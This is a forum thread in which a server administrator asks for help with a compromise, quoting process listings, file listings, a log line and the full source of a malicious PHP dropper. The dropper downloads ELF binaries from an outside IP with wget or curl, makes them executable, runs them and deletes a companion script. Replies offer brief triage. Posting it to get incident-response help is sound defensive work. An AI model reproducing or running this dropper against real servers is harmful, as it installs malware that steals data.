Strange programs running server

[jimhermann]

Folks,

How do I determine what these strange programs have been doing on my server?

root 9771 0.0 0.0 20164 1164 ? Ss Mar22 0:00 jailshell (username) [9817] l -c /home/username/public_html/Linux_amd64 > /dev/null 2>&1
username 9817 0.0 0.0 20164 268 ? S Mar22 0:42 jailshell (username) [init] l -c /home/jimhermann/public_html/Linux_amd64 > /dev/null 2>&1

They were saved to the hard drive by 550.php script. I ran chmod 000 after I found them.

----------. 1 username username 2228748 Mar 16 05:11 Linux_x86
----------. 1 username username 2377240 Mar 16 05:11 Linux_amd64
----------. 1 username username 453 Mar 22 08:49 550.php

It looks like files 412.php and 550.php were uploaded first before March, then 550.php was executed via http on March 22.

# more 550.php
<?php
system('wget "http://82.165.106.79/Linux_x86" 2>/dev/null || curl -O "http://82.165.106.79/Linux_x86"');
system('chmod 777 ./Linux_x86');
system('nohup ./Linux_x86 2>&1 &');
system('ps aux|stealth');

system('wget "http://82.165.106.79/Linux_amd64" 2>/dev/null || curl -O "http://82.165.106.79/Linux_amd64"');
system('chmod 777 ./Linux_amd64');
system('nohup ./Linux_amd64 2>&1 &');
system('ps aux|grep stealth');

system('rm -rf 412.php');
?>

# grep 93.41.203.52 username.com-ssl_log-Mar-2022
93.41.203.52 - - [22/Mar/2022:09:25:57 -0500] "GET /550.php HTTP/1.1" 200 250 "-" "curl/7.52.1"

Imunify AV+ reported that the Linux_amd64 file was infected with SMW-BLKH-1421002-elf.troj

Thanks,

Jim

 

[cPRex]

Hey there! The good news is that the compromise only appears to be at the user level, as the files were owned by the cPanel user and not root. If you do a search for "Linux_amd64 malware" you'll see many references to that tool, mostly about trying to capture network traffic to get sensitive data.

 

[anton_latvia]

yeah, these accounts got hacked.